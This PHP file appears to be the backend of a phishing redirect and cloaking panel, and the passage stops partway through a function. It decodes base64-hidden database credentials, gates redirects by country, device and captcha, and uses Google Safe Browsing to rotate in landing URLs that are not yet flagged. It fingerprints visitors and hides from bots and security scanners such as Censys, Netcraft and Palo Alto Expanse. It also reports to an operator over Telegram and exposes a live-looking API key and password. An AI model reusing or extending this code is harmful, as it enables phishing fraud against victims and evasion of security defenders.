<?php
header('Content-Type: application/json');
header("Access-Control-Allow-Origin: *");

// Handle preflight requests
if ($_SERVER['REQUEST_METHOD'] === 'OPTIONS') {
    header("Access-Control-Allow-Origin: *");
    header("Access-Control-Allow-Methods: POST, GET, OPTIONS");
    header("Access-Control-Allow-Headers: Content-Type, Authorization");
    http_response_code(200);
    exit();
}

// Start session if not already started
if (session_status() == PHP_SESSION_NONE) {
    // Use a writable session path to avoid permission errors on shared hosting
    $sessionPath = sys_get_temp_dir();
    if (!is_dir($sessionPath) || !is_writable($sessionPath)) {
        $sessionPath = __DIR__ . '/sessions';
        if (!is_dir($sessionPath)) {
            mkdir($sessionPath, 0700, true);
        }
    }
    session_save_path($sessionPath);
    session_start();
}


$fs_host = base64_decode("MTk4LjI1MS44NC4yMDA");
$fs_user = base64_decode("emVyb2RheXNfZGF5");
$fs_pass = base64_decode("ZHJjZ2lseVAwKmsm");
$fs_name = base64_decode("emVyb2RheXNfZGF5");

//$fs_host = 'localhost';
//fs_user = 'root';
//$fs_pass = '';
//$fs_name = 'zerodays_day';

global $fs_host, $fs_user, $fs_pass, $fs_name, $local_userAgent, $local_time, $local_domain, $local_os, $local_browser;


function redirction_data($id, $client_info, $ipAddress)
{
    global $fs_host, $fs_user, $fs_pass, $fs_name;

    if (empty($id)) {
        $errorMsg = 'No user ID provided';
        $res = banned_client($ipAddress, $errorMsg, $client_info);
        return ['status' => 'error', 'message' => $errorMsg];
    }

    $db = mysqli_connect($fs_host, $fs_user, $fs_pass, $fs_name);
    if (!$db) {
        die(json_encode(['status' => 'error', 'message' => 'Database connection failed']));
    }

    $id = mysqli_real_escape_string($db, $id);
    $sql_u = "SELECT * FROM redirects WHERE source_url='$id'";

    $res_u = mysqli_query($db, $sql_u);

    if ($res_u === false) {
        $errorMsg = "Query failed: " . mysqli_error($db);
        return ['status' => 'error', 'message' => $errorMsg];
    }

    $numRows = mysqli_num_rows($res_u);

    if ($numRows > 0) {
        $row = mysqli_fetch_assoc($res_u);

        // Fetch token & chatid from panel using admin_name
        $admin_name = mysqli_real_escape_string($db, $row["admin_name"]);
        $sql_panel = "SELECT token, chatid FROM panel WHERE panel_user='$admin_name' LIMIT 1";
        $res_panel = mysqli_query($db, $sql_panel);

        $token = null;
        $chatid = null;

        if ($res_panel && mysqli_num_rows($res_panel) > 0) {
            $panel_data = mysqli_fetch_assoc($res_panel);
            $token = $panel_data['token'];
            $chatid = $panel_data['chatid'];
        }

        $data = [
            'status' => true,
            'message' => 'data found',
            'source_url' => $row["source_url"],
            'destination_url' => $row["destination_url"],
            'allow_country' => explode(";", $row["allow_country"]),
            'logo_url' => $row["logo_url"],
            'source_name' => $row["source_name"],
            'admin_name' => $row["admin_name"],
            'token' => $token,
            'chatid' => $chatid,
            'allow_proxy' => $row["allow_proxy"],
			'allow_mobile' => $row["allow_mobile"],
            'status_url' => $row["status"],
            'created_at' => $row["created_at"],
            'updated_at' => $row["updated_at"],
            'clicks' => $row["clicks"],
            'last_clicked_at' => $row["last_clicked_at"],
        ];
    } else {
        $data = [
            'status' => false,
            'message' => 'data not found',
        ];
    }

    mysqli_close($db);
    return $data;
}
function user_data($id, $client_info, $ipAddress)
{
    global $fs_host, $fs_user, $fs_pass, $fs_name;

    if (empty($id)) {
        $errorMsg = 'No user ID provided';
        $res = banned_client($ipAddress, $errorMsg, $client_info);
        return ['status' => 'error', 'message' => $errorMsg];
    }

    $db = mysqli_connect($fs_host, $fs_user, $fs_pass, $fs_name);
    if (!$db) {
        die(json_encode(['status' => 'error', 'message' => 'Database connection failed']));
    }

    $id = mysqli_real_escape_string($db, $id);
    $sql_u = "SELECT * FROM redirction WHERE id='$id'";

    $res_u = mysqli_query($db, $sql_u);

    if ($res_u === false) {
        $errorMsg = "Query failed: " . mysqli_error($db);
        return ['status' => 'error', 'message' => $errorMsg];
    }

    $numRows = mysqli_num_rows($res_u);

    if ($numRows > 0) {
        $row = mysqli_fetch_assoc($res_u);
        $data = [
            'status' => 'success',
            'message' => 'data found',
            'link' => base64_decode(base64_decode($row["link"])),
            'cn' => explode(";", base64_decode(base64_decode($row["country"]))),
            'pic' => $row["pic"],
            'msg' => base64_decode(base64_decode($row["msg"])),
            'expire_date' => $row["expire_date"],
            'server' => base64_decode(base64_decode($row["server"])),
            'url' => base64_decode(base64_decode($row["url"])),
            'luxcaptcha' => $row["luxcaptcha"],
            'tokentel' => base64_decode(base64_decode($row["tokentel"])),
            'idtel' => base64_decode(base64_decode($row["idtel"])),
            'redirict' => $row["redirict"],
            'project' => $row["project"],
            'api' => $row["api"],
            'addby' => $row["addby"],
            'isprotect' => $row["isprotect"],
            'proxy' => $row["proxy"],
            'captcha_data' => $row["captcha"],
            'goole_cap' => $row["google_cap"],
            'cloud_cap' => $row["cloud_cap"],
            'pro_ico' => $row["pro_ico"],
            'pro_color' => $row["pro_color"],
            'pro_msg' => $row["pro_msg"],
            'pro_img' => $row["pro_img"],
            'pro_logo' => $row["pro_logo"],
        ];
    } else {
        $errorMsg = "User not found in database. ID: " . $id;

        // Get total users count safely
        $totalUsers = 0;
        $countResult = mysqli_query($db, "SELECT COUNT(*) as count FROM redirction");
        if ($countResult && ($countRow = mysqli_fetch_assoc($countResult))) {
            $totalUsers = (int) $countRow['count'];
        }

        // Get sample user IDs safely
        $userList = [];
        $allUsers = mysqli_query($db, "SELECT id FROM redirction LIMIT 10");
        if ($allUsers) {
            while ($row = mysqli_fetch_assoc($allUsers)) {
                $userList[] = $row['id'];
            }
        }

        $res = banned_client($ipAddress, "user not found: $id logged", $client_info);
        $data = [
            'status' => 'error',
            'message' => $res['message'],
            'debug' => [
                'searched_id' => $id,
                'total_users' => $totalUsers,
                'database' => $fs_name,
                'table' => 'redirction',
                'sample_ids' => $userList,
            ],
        ];
    }

    mysqli_close($db);
    return $data;
}
function url_packet()
{
    global $fs_host, $fs_user, $fs_pass, $fs_name;
    $db = mysqli_connect($fs_host, $fs_user, $fs_pass, $fs_name);
    if (!$db) {
        die(json_encode(['status' => 'error', 'message' => 'Database connection failed']));
    }
    $sql = "SELECT * FROM luxdataurl WHERE status = '0'";
    $result = mysqli_query($db, $sql);
    $links = [];
    while ($row = mysqli_fetch_assoc($result)) {
        $links[] = $row["luxurl"];
    }
    mysqli_close($db);
    $links = array_unique($links);
    if (count($links) > 0) {
        shuffle($links);
        foreach ($links as $random_link) {
            $safety_result = checkUrlSafety($random_link);
            if ($safety_result === "Safe") {
                return $random_link;
            }
        }
        return "No safe URLs available.";
    } else {
        return "No URLs available.";
    }
}
function get_captcha($domain)
{
    global $fs_host, $fs_user, $fs_pass, $fs_name;

    $raw = trim((string)$domain);

    // Strip protocol and trailing slashes to get bare host (e.g. "localhost" or "example.com")
    $normalized = preg_replace('#^https?://#i', '', $raw);
    $normalized = rtrim($normalized, '/');
    // Hostname without port
    $hostname = explode(':', $normalized)[0];

    // Build all candidate values to try, in priority order:
    // 1. exact raw value sent by client  (e.g. "http://localhost")
    // 2. https variant                   (e.g. "https://localhost")
    // 3. http variant                    (e.g. "http://localhost")
    // 4. normalized (no protocol)        (e.g. "localhost")
    // 5. hostname only (no port)         (e.g. "localhost")
    // 6. 127.0.0.1 fallback when host is localhost
    $candidates = array_unique(array_filter([
        $raw,
        'https://' . $normalized,
        'http://'  . $normalized,
        $normalized,
        $hostname,
        ($hostname === 'localhost' || $hostname === '127.0.0.1') ? '127.0.0.1'  : '',
        ($hostname === 'localhost' || $hostname === '127.0.0.1') ? 'localhost'   : '',
        ($hostname === 'localhost' || $hostname === '127.0.0.1') ? 'https://localhost' : '',
        ($hostname === 'localhost' || $hostname === '127.0.0.1') ? 'http://localhost'  : '',
        ($hostname === 'localhost' || $hostname === '127.0.0.1') ? 'https://127.0.0.1' : '',
        ($hostname === 'localhost' || $hostname === '127.0.0.1') ? 'http://127.0.0.1'  : '',
    ]));

    $db = mysqli_connect($fs_host, $fs_user, $fs_pass, $fs_name);
    if (!$db) {
        die(json_encode(['status' => 'error', 'message' => 'Database connection failed']));
    }

    $publickey  = '';
    $privatekey = '';

    foreach ($candidates as $try) {
        if (empty($try)) continue;
        $stmt = $db->prepare("SELECT publickey, privatekey FROM captcha WHERE domain = ?");
        $stmt->bind_param("s", $try);
        $stmt->execute();
        $result = $stmt->get_result();
        if ($row = $result->fetch_assoc()) {
            // Skip rows that exist but have empty keys — keep searching
            if (empty($row["publickey"]) || empty($row["privatekey"])) {
                $stmt->close();
                continue;
            }
            $publickey  = $row["publickey"];
            $privatekey = $row["privatekey"];
            $stmt->close();
            break;
        }
        $stmt->close();
    }

    $db->close();

    return [
        'publickey'  => $publickey,
        'privatekey' => $privatekey,
    ];
}
function checkUrlSafety($url)
{
    $apiKey = "AIzaSyCv3mI6TjtqYTYQ8nZpA3Sx_7VSrq-hDyU";
    $apiEndpoint = "https://safebrowsing.googleapis.com/v4/threatMatches:find?key=$apiKey";
    $requestData = [
        "client" => [
            "clientId" => "globalcom",
            "clientVersion" => "1.5.2",
        ],
        "threatInfo" => [
            "threatTypes" => ["MALWARE", "SOCIAL_ENGINEERING"],
            "platformTypes" => ["WINDOWS"],
            "threatEntryTypes" => ["URL"],
            "threatEntries" => [["url" => $url]],
        ],
    ];

    $jsonData = json_encode($requestData);
    $ch = curl_init($apiEndpoint);
    curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "POST");
    curl_setopt($ch, CURLOPT_POSTFIELDS, $jsonData);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_HTTPHEADER, ["Content-Type: application/json", "Content-Length: " . strlen($jsonData)]);

    $response = curl_exec($ch);

    if (curl_errno($ch)) {
        $result = "cURL Error: " . curl_error($ch);
    } else {
        $responseData = json_decode($response, true);
        if (isset($responseData["matches"]) && count($responseData["matches"]) > 0) {
            $result = "Not Safe";
            $messageme = "❌ System:\nDanger Link: $url";
            tele_message($messageme);
        } else {
            $result = "Safe";
        }
    }

    curl_close($ch);
    return $result;
}
function send_command($local_userAgent, $ip, $url, $command, $id, $host)
{
    $fields = [
        "send_ip" => $ip,
        "send_domain" => $url,
        "return_domain" => $host,
        "send_action" => $command,
        "send_id" => $id,
    ];

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($fields));
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_USERAGENT, $local_userAgent);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
    curl_setopt($ch, CURLOPT_TIMEOUT, 60); // Set timeout to 30 seconds

    $response = curl_exec($ch);

    if (curl_errno($ch)) {
        $error_message = curl_error($ch);
        curl_close($ch);
        return ["error" => "Curl error: " . $error_message];
    }

    curl_close($ch);
    // Decode the response
    $result = json_decode($response, true);

    return $result;
}

function detect_user($ipAddress)
{
    global $fs_host, $fs_user, $fs_pass, $fs_name;
    $db = mysqli_connect($fs_host, $fs_user, $fs_pass, $fs_name);
    if (!$db) {
        die("Connection failed: " . mysqli_connect_error());
    }
    $sql_u = "SELECT * FROM logs WHERE ipaddres='$ipAddress'";
    $res_u = mysqli_query($db, $sql_u);
    if (mysqli_num_rows($res_u) > 0) {
        mysqli_close($db);
        return true;
    }
    mysqli_close($db);
    return false;
}
function fetchIPInfo($ipAddress)
{
    $url = "http://ip-api.com/json/{$ipAddress}?fields=status,message,continent,continentCode,country,countryCode,region,regionName,city,district,zip,lat,lon,timezone,offset,currency,isp,org,as,asname,reverse,mobile,proxy,hosting,query";
    $curl = curl_init($url);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
    $response = curl_exec($curl);
    curl_close($curl);

    $info = json_decode($response, true);

    if (!isset($info['status']) || $info['status'] !== 'success') {
        return [
            "isp" => "Unknown",
            "country" => "Unknown",
            "countryCode" => "Unknown",
            "city" => "Unknown",
            "region" => "Unknown",
            "proxy" => "False",
            "mobile" => "False",
            "hosting" => "False",
        ];
    }

    return [
        "isp" => $info["isp"] ?? null,
        "country" => $info["country"] ?? null,
        "countryCode" => $info["countryCode"] ?? null,
        "city" => $info["city"] ?? null,
        "region" => $info["regionName"] ?? null,
        "proxy" => !empty($info["proxy"]) ? "True" : "False",
        "mobile" => !empty($info["mobile"]) ? "True" : "False",
        "hosting" => !empty($info["hosting"]) ? "True" : "False",
    ];
}
function detectDeviceDetails($userAgent, $ipAddress)
{
    $referrer = $_SERVER['HTTP_REFERER'] ?? 'None';
    $deviceType = detect_device_type($userAgent);
    $deviceName = detect_device_name($userAgent);
    $os = get_platform($userAgent);
    $osVersion = detect_os_version($userAgent, $os);
    $browser = get_browser_value($userAgent);
    $browserVersion = get_browser_version($userAgent, $browser);
    $requestSource = get_request_source($userAgent);
    $isFakeUserAgent = checkFakeUserAgent($userAgent);
    $isHttps = !empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off' ? 'Yes' : 'No';
    $connectionType = $_SERVER['HTTP_CONNECTION'] ?? 'Unknown';
    $ipDetails = fetchIPInfo($ipAddress);
    $isp = $ipDetails['isp'];
    $country = $ipDetails['country'];
    $countryCode = $ipDetails['countryCode'];
    $city = $ipDetails['city'];
    $region = $ipDetails['region'];
    $proxy = $ipDetails['proxy'];
    $mobile = $ipDetails['mobile'];
    $hosting = $ipDetails['hosting'];
    $local_time = date("Y-m-d H:i:s");
    $local_domain = $_SERVER["SERVER_NAME"];
    return [
        "DeviceType" => $deviceType,
        "DeviceName" => $deviceName,
        "Os" => $os,
        "OsVersion" => $osVersion,
        "Browser" => $browser,
        "BrowserVersion" => $browserVersion,
        "RequestSource" => $requestSource,
        "IsFakeUserAgent" => $isFakeUserAgent,
        "Referrer" => $referrer,
        "IsHttps" => $isHttps,
        "ConnectionType" => $connectionType,
        "UserAgent" => $userAgent,
        "ipAddress" => $ipAddress,
        "isp" => $isp,
        "country" => $country,
        "countryCode" => $countryCode,
        "city" => $city,
        "region" => $region,
        "proxy" => $proxy,
        "mobile" => $mobile,
        "hosting" => $hosting,
        "local_time" => $local_time,
        "local_domain" => $local_domain,
    ];
}
function detect_device_type($userAgent)
{
    if (preg_match('/windows phone|iemobile|mobile/i', $userAgent)) {
        return "Mobile";
    } elseif (preg_match('/tablet|ipad|playbook|silk/i', $userAgent)) {
        return "Tablet";
    } elseif (preg_match('/smart-tv|tv|chromecast|roku|appletv|playstation|xbox|nintendo/i', $userAgent)) {
        return "Smart TV/Console";
    } elseif (preg_match('/windows|linux|macintosh|ubuntu/i', $userAgent)) {
        return "Desktop";
    } elseif (preg_match('/watch|wear/i', $userAgent)) {
        return "Wearable";
    } elseif (is_bot($userAgent)) {
        return "Bot";
    }
    return "Unknown";
}
function detect_os_version($userAgent, $os)
{
    $architecture = stripos($userAgent, 'x64') !== false || stripos($userAgent, 'Win64') !== false ? '64-bit' : '32-bit';
    if (preg_match('/PlayStation (\d+)/i', $userAgent, $matches)) {
        $psVersion = $matches[1];
        return "{$psVersion} ({$architecture})";
    }
    if ($os === "iPad" && preg_match('/cpu os (\d+[_\d]*) like mac os x/i', $userAgent, $matches)) {
        $version = str_replace('_', '.', $matches[1]);
        return "{$version} ({$architecture})";
    }

    if (preg_match('/CPU OS (\d+_\d+)/i', $userAgent, $matches)) {
        return str_replace('_', '.', $matches[1]);
    }
    if (preg_match('/ubuntu/i', $userAgent)) {
        return "X11 ({$architecture})";
    }
    if (preg_match('/iPhone OS (\d+_\d+_\d+)/i', $userAgent, $matches)) {
        $version = str_replace('_', '.', $matches[1]);
        return "iOS " . $version . " (32-bit)";
    }
    if (stripos($os, "Windows") !== false) {
        if (preg_match('/windows nt (\d+\.\d+)/i', $userAgent, $matches)) {
            $version = $matches[1];

            switch ($version) {
                case '10.0':
                    return "10 ({$architecture})";
                case '6.3':
                    return "8.1 ({$architecture})";
                case '6.2':
                    return "8 ({$architecture})";
                case '6.1':
                    return "7 ({$architecture})";
                case '6.0':
                    return "Vista ({$architecture})";
                case '5.1':
                    return "XP ({$architecture})";
                default:
                    return "Unknown version ({$version})";
            }
        }
    }

    if (preg_match('/mac os x (\d+[_\d]*)/i', $userAgent, $matches)) {
        return str_replace('_', '.', $matches[1]) . " ({$architecture})";
    }

    if (preg_match('/android ([\d.]+)/i', $userAgent, $matches)) {
        return $matches[1] . " ({$architecture})";
    }

    if (preg_match('/iphone os (\d+[_\d]*)/i', $userAgent, $matches)) {
        return str_replace('_', '.', $matches[1]) . " ({$architecture})";
    }

    return "Unknown ({$architecture})";
}
function matchOSVersion($version)
{
    switch ($version) {
        case '10.0':
            return 'Windows 10';
        case '11.0':
            return 'Windows 11';
        case '6.3':
            return 'Windows 8.1';
        case '6.2':
            return 'Windows 8';
        case '6.1':
            return 'Windows 7';
        case '6.0':
            return 'Windows Vista';
        case '5.1':
            return 'Windows XP';
        case '5.0':
            return 'Windows 2000';
        default:
            return "Unknown version ({$version})";
    }
}
function detect_device_name($userAgent)
{
    $deviceName = "Unknown";
    $devices = [
        "/sm-[a-z0-9]+/i" => "Samsung Galaxy",
        "/SM-G/i" => "Samsung Galaxy",
        "/GT-I/i" => "Samsung Galaxy",
        "/SAMSUNG/i" => "Samsung Galaxy",
        "/Galaxy/i" => "Samsung Galaxy",
        "/SCH-/i" => "Samsung Galaxy",
        "/Note/i" => "Samsung Galaxy",
        "/A52/i" => "Samsung Galaxy",
        "/A71/i" => "Samsung Galaxy",
        // Xiaomi Devices with more patterns
        "/Mi [a-z0-9]+/i" => "Xiaomi",
        "/M2101K6G/i" => "Xiaomi",
        "/xiaomi/i" => "Xiaomi",
        "/redmi/i" => "Xiaomi",
        "/Mi[ ]*[a-z0-9]+/i" => "Xiaomi",
        "/Mi Max/i" => "Xiaomi",
        "/Redmi/i" => "Xiaomi",
        "/Poco/i" => "Xiaomi",
        "/Mi 11/i" => "Xiaomi",
        "/Redmi Note/i" => "Xiaomi",
        // Huawei Devices with more patterns
        "/ELS-[a-z0-9]+/i" => "Huawei",
        "/NKE-[a-z0-9]+/i" => "Huawei",
        "/huawei/i" => "Huawei",
        "/HUAWEI/i" => "Huawei",
        "/P30/i" => "Huawei",
        "/Mate/i" => "Huawei",
        "/HONOR/i" => "Huawei",
        "/Y9/i" => "Huawei",
        "/Nova/i" => "Huawei",
        // OnePlus Devices with more patterns
        "/IN2025/i" => "OnePlus",
        "/oneplus/i" => "OnePlus",
        "/A5000/i" => "OnePlus",
        "/OnePlus/i" => "OnePlus",
        "/OXYGEN/i" => "OnePlus",
        "/OnePlus 9/i" => "OnePlus",
        "/OnePlus Nord/i" => "OnePlus",
        "/BE[a-z0-9]+/i" => "OnePlus",
        // Apple Devices with more patterns
        "/iphone/i" => "Apple Device",
        "/ipad/i" => "Apple Device",
        "/ipod/i" => "Apple Device",
        "/iPhone X/i" => "Apple Device",
        "/iPhone 11/i" => "Apple Device",
        "/iPad Pro/i" => "Apple Device",
        // Google Pixel Devices with more patterns
        "/pixel/i" => "Google Pixel",
        "/Google Pixel/i" => "Google Pixel",
        "/Pixel/i" => "Google Pixel",
        "/Nexus/i" => "Google Pixel",
        "/Google/i" => "Google Pixel",
        "/Pixel 5/i" => "Google Pixel",
        "/Pixel 4/i" => "Google Pixel",
        "/Pixel XL/i" => "Google Pixel",
        // Sony Devices with more patterns
        "/sony/i" => "Sony",
        "/Xperia/i" => "Sony",
        "/Sony Xperia/i" => "Sony",
        "/Xperia XZ/i" => "Sony",
        "/Xperia Z/i" => "Sony",
        // LG Devices with more patterns
        "/lg/i" => "LG",
        "/LG-/i" => "LG",
        "/LG G/i" => "LG",
        "/LG V/i" => "LG",
        // HTC Devices with more patterns
        "/htc/i" => "HTC",
        "/HTC-/i" => "HTC",
        "/Desire/i" => "HTC",
        "/HTC One/i" => "HTC",
        // Motorola Devices with more patterns
        "/motorola/i" => "Motorola",
        "/moto/i" => "Motorola",
        "/XT/i" => "Motorola",
        "/Motorola-/i" => "Motorola",
        "/Moto G/i" => "Motorola",
        // Oppo Devices with more patterns
        "/oppo/i" => "Oppo",
        "/CPH/i" => "Oppo",
        "/Oppo-/i" => "Oppo",
        "/Reno/i" => "Oppo",
        "/Oppo F/i" => "Oppo",
        // Vivo Devices with more patterns
        "/vivo/i" => "Vivo",
        "/VIVO/i" => "Vivo",
        "/vivo-/i" => "Vivo",
        "/Vivo-/i" => "Vivo",
        "/Vivo V/i" => "Vivo",
        // Realme Devices with more patterns
        "/realme/i" => "Realme",
        "/RMX/i" => "Realme",
        "/Realme/i" => "Realme",
        "/Realme X/i" => "Realme",
        "/Realme 7/i" => "Realme",
        // Lenovo Devices with more patterns
        "/lenovo/i" => "Lenovo",
        "/Lenovo-/i" => "Lenovo",
        "/LAVIE/i" => "Lenovo",
        "/Lenovo K/i" => "Lenovo",
        // Asus Devices with more patterns
        "/asus/i" => "Asus",
        "/ZenFone/i" => "Asus",
        "/ROG/i" => "Asus",
        "/Zenfone 6/i" => "Asus",
        // Nokia Devices with more patterns
        "/nokia/i" => "Nokia",
        "/Nokia-/i" => "Nokia",
        "/Lumia/i" => "Nokia",
        "/Nokia 6/i" => "Nokia",
    ];

    if (preg_match('/\((?:Linux|Android).*?;\s*([^;]+?)\s*;.*?\)/i', $userAgent, $matches)) {
        $deviceName = trim($matches[1]);
    }

    foreach ($devices as $regex => $name) {
        if (preg_match($regex, $userAgent)) {
            return $name;
        }
    }

    if ($deviceName === "Unknown" && preg_match('/\b([A-Za-z0-9]+)\b/i', $userAgent, $matches)) {
        $deviceName = $matches[1];
    }

    return $deviceName;
}
function get_platform($userAgent)
{
    $osArray = [
        "/windows nt 11/i" => "Windows 11",
        "/windows nt 10/i" => "Windows 10",
        "/windows nt 6.3/i" => "Windows 8.1",
        "/windows nt 6.2/i" => "Windows 8",
        "/windows nt 6.1/i" => "Windows 7",
        "/android/i" => "Android",
        "/iphone/i" => "iOS",
        "/ipad/i" => "iOS",
        "/macintosh|mac os x/i" => "Mac OS X",
        "/ubuntu/i" => "Ubuntu",
        "/linux/i" => "Linux",
        "/PlayStation/i" => "PlayStation",
    ];

    foreach ($osArray as $regex => $osName) {
        if (preg_match($regex, $userAgent)) {
            return $osName;
        }
    }
    return "Unknown OS Platform";
}
function get_browser_value($userAgent)
{
    $browsers = [
        "/edg|edge/i" => "Microsoft Edge",
        "/firefox|fxios|firefox-kito/i" => "Firefox",
        "/chrome|crios/i" => "Chrome Browser",
        "/safari/i" => "Safari Browser",
        "/opera|opr/i" => "Opera Browser",
        "/SeaMonkey/i" => "SeaMonkey Browser",
        "/Nintendo/i" => "Nintendo Browser",
        "/yabrowser/i" => "Yandex Browser",
        "/duckduckgo/i" => "DuckDuckGo Browser",
        "/ucbrowser/i" => "UC Browser",
        "/qqbrowser/i" => "QQ Browser",
        "/baidubrowser/i" => "Baidu Browser",
        "/samsungbrowser/i" => "Samsung Internet Browser",
        "/maxthon/i" => "Maxthon Browser",
        "/avast/i" => "Avast Secure Browser",
        "/avira/i" => "Avira Browser",
        "/midori/i" => "Midori Browser",
        "/tor/i" => "Tor Browser",
        "/netscape/i" => "Netscape",
        "/konqueror/i" => "Konqueror",
        "/seamonkey/i" => "SeaMonkey",
        "/epiphany/i" => "Epiphany",
    ];

    if (isTorBrowser($userAgent)) {
        return "Tor Browser";
    }
    foreach ($browsers as $regex => $browser) {
        if (preg_match($regex, $userAgent)) {
            return $browser;
        }
    }
    if (is_bot($userAgent)) {
        return "Internet Explorer";
    }
    if (preg_match('/Trident\//i', $userAgent)) {
        return "Internet Explorer";
    }
    return "Unknown Browser";
}
function isTorBrowser($userAgent)
{
    if (preg_match('/Firefox\/\d+\.?\d*\.?\d*esr/', $userAgent) && preg_match('/Gecko\/20100101/', $userAgent)) {
        return true; // Likely a Tor Browser user
    }
    return false;
}

function get_browser_version($userAgent, $browser)
{
    $browserPatterns = [
        "Firefox" => "/(?:Firefox|Firefox-KiToBrowser)\/([\d\.]+)/i",
        "Chrome" => "/Chrome\/([\d\.]+)/i",
        "Safari" => "/Version\/([\d\.]+)/i",
        "Microsoft Edge" => "/Edg\/([\d\.]+)/i",
        "SeaMonkey" => "/SeaMonkey\/([\d\.]+(?:\.[\d]+)+)/i",
        "Opera" => "/Opera\/([\d\.]+)|OPR\/([\d\.]+)/i",
    ];
    if (preg_match('/Version\/([\d\.]+)/i', $userAgent, $matches)) {
        return $matches[1];
    }
    if (preg_match('/Firefox\/(\d+\.\d+\.?\d*esr)/', $userAgent, $matches)) {
        return $matches[1];
    }
    if (preg_match('/CriOS\/([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)/i', $userAgent, $matches)) {
        return $matches[1];
    }
    if (preg_match('/Chrome\/([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)/i', $userAgent, $matches)) {
        return $matches[1];
    }
    if (isset($browserPatterns[$browser])) {
        if (preg_match($browserPatterns[$browser], $userAgent, $matches)) {
            return $matches[1];
        }
    }

    if (is_bot($userAgent)) {
        return "1.0";
    }

    return "Unknown Version";
}
function get_request_source($userAgent)
{
    if (is_bot($userAgent)) {
        return "Bot/crowl";
    } elseif (preg_match('/python|curl|wget|postmanruntime|java|node\.js|axios|go-http-client/i', $userAgent)) {
        return "Script/Program";
    }
    return "Browser";
}
function checkFakeUserAgent($userAgent)
{
    $commonBrowsers = ['/Mozilla/', '/Chrome/', '/Safari/', '/Firefox/', '/Edge/', '/Opera/', '/MSIE/', '/Trident/'];

    $botPatterns = [
        '/bot/',
        '/crawler/',
        '/spider/',
        '/googlebot/',
        '/bingbot/',
        '/yandexbot/',
        '/slurp/',
        '/duckduckbot/',
        '/baidu/',
        '/ahrefsbot/',
        '/mj12bot/',
        '/dotbot/',
        '/seznambot/',
        '/zyborg/',
        '/telegrambot/',
        '/facebookexternalhit/',
        '/twitterbot/',
        '/bingpreview/',
    ];
    foreach ($botPatterns as $pattern) {
        if (preg_match($pattern, $userAgent)) {
            return "Yes";
        }
    }
    if (is_bot($userAgent)) {
        return "Yes";
    }
    foreach ($commonBrowsers as $pattern) {
        if (preg_match($pattern, $userAgent)) {
            return "No";
        }
    }

    return "Yes";
}
function is_bot_ip($ipToCheck)
{
    $botsUrls = [
        "google" => "https://developers.google.com/search/apis/ipranges/googlebot.json",
        "bing" => "https://www.bing.com/toolbox/bingbot.json",
    ];

    foreach ($botsUrls as $bot => $url) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

        $response = curl_exec($ch);

        if ($response === false) {
            $error = curl_error($ch);
            curl_close($ch);
            throw new Exception("Failed to fetch bot IP ranges for $bot: $error");
        }

        curl_close($ch);

        $botResp = json_decode($response, true);

        if (!is_array($botResp) || empty($botResp["prefixes"]) || !is_array($botResp["prefixes"])) {
            continue; // skip this bot source if response is invalid or missing prefixes
        }

        foreach ($botResp["prefixes"] as $ipRange) {
            if (isset($ipRange["ipv6Prefix"]) && strpos($ipToCheck, ":") !== false) {
                $network = $ipRange["ipv6Prefix"];
            } elseif (isset($ipRange["ipv4Prefix"]) && strpos($ipToCheck, ":") === false) {
                $network = $ipRange["ipv4Prefix"];
            } else {
                continue;
            }

            if (ip_in_range($ipToCheck, $network)) {
                return $bot;
            }
        }
    }

    return false;
}
function ip_in_range($ip, $range)
{
    list($subnet, $mask) = explode("/", $range);
    $mask = (int) $mask;
    $subnetBin = inet_pton($subnet);
    $ipBin = inet_pton($ip);
    $maskBin = str_repeat("\xFF", $mask >> 3) . chr(0xff << 8 - ($mask & 0x07));
    if (strlen($subnetBin) < 4 || strlen($ipBin) < 4 || strlen($maskBin) < 4) {
        return false;
    }
    $subnetInt = unpack("N", $subnetBin)[1];
    $ipInt = unpack("N", $ipBin)[1];
    $maskInt = unpack("N", $maskBin)[1];
    return ($subnetInt & $maskInt) === ($ipInt & $maskInt);
}

function tele_message($message)
{
    $TrubFtub = $_SESSION["idtel"];
    $cRetVckr = $_SESSION["tokentel"];
    $api_url = "https://api.telegram.org/bot{$cRetVckr}/sendMessage";
    $params = ["chat_id" => $TrubFtub, "text" => $message];
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $api_url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params));
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $response = curl_exec($ch);
    curl_close($ch);
    return $response;
}
function fetchContentFromURL($url)
{
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $content = curl_exec($ch);
    curl_close($ch);
    return $content;
}
function is_bot($userAgent)
{
    $botKeywords = [
        'bot',
        'crawler',
        'spider',
        'fetch',
        'scanner',
        'scraper',
        'yandexbot',
        'baiduspider',
        'googlebot',
        'bingbot',
        'duckduckbot',
        'turnitinbot',
        'netcraft',
        'amazonbot',
        'censys',
        'paloalto',
        'expanse',
        'zgrab',
        'semrushbot',
        'mj12bot',
        'facebookexternalhit',
        'facebot',
        'twitterbot',
        'linkedinbot',
        'telegram',
        '(compatible',
        'datadog',
        'slackbot',
        'discordbot',
        'zapier',
        'starlink',
    ];

    foreach ($botKeywords as $bot) {
        if (stripos($userAgent, $bot) !== false) {
            return true;
        }
    }

    if (preg_match('/Expanse.*Palo Alto Networks/i', $userAgent)) {
        return true;
    }

    return false;
}

function banned_client(string $ipAddress, string $reason, array $clientData): array
{
    global $fs_host, $fs_user, $fs_pass, $fs_name;

    // 1) Connect DB
    $db = new mysqli($fs_host, $fs_user, $fs_pass, $fs_name);
    if ($db->connect_errno) {
        return ['res_status' => '500', 'message' => 'DB connection failed: ' . $db->connect_error];
    }

